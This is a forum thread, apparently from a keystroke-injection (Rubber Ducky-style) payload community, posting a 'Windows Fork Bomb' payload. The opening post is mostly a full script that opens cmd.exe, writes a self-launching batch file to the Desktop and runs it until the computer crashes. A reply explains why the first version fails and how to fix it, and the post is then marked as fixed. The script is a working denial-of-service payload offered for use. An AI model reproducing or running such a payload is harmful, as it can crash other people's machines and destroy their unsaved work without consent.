Jump to content

[Payload] Windows Fork Bomb


3699n

Recommended Posts

This a windows fork bomb. When the script gets run it creates a batch file which continuously starts its self until the computer crashes.

DELAY 3000
GUI R
DELAY 500
STRING cmd.exe
DELAY 1000
ENTER
DELAY 1000
STRING cd Desktop
ENTER
STRING copy con forkbomb.bat
ENTER
STRING @echo off
ENTER
STRING :start
CTRL-S
DELAY 500
STRING start forkbomb.bat
ENTER

STRING goto start

ENTER

CTRL-Z

ENTER

STRING forkbomb.bat

ENTER
ALT-F4

Edited by 3699n
Link to comment
Share on other sites

There's a few problems, seeing as this script won't actually work.

You should open CMD, use copy con to write out a file and name it properly (in the above, the file would actually be saved as forkbomb.bat.txt), then run the batch file through the command line.

UPDATE: code fixed.

Edited by Xcellerator
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...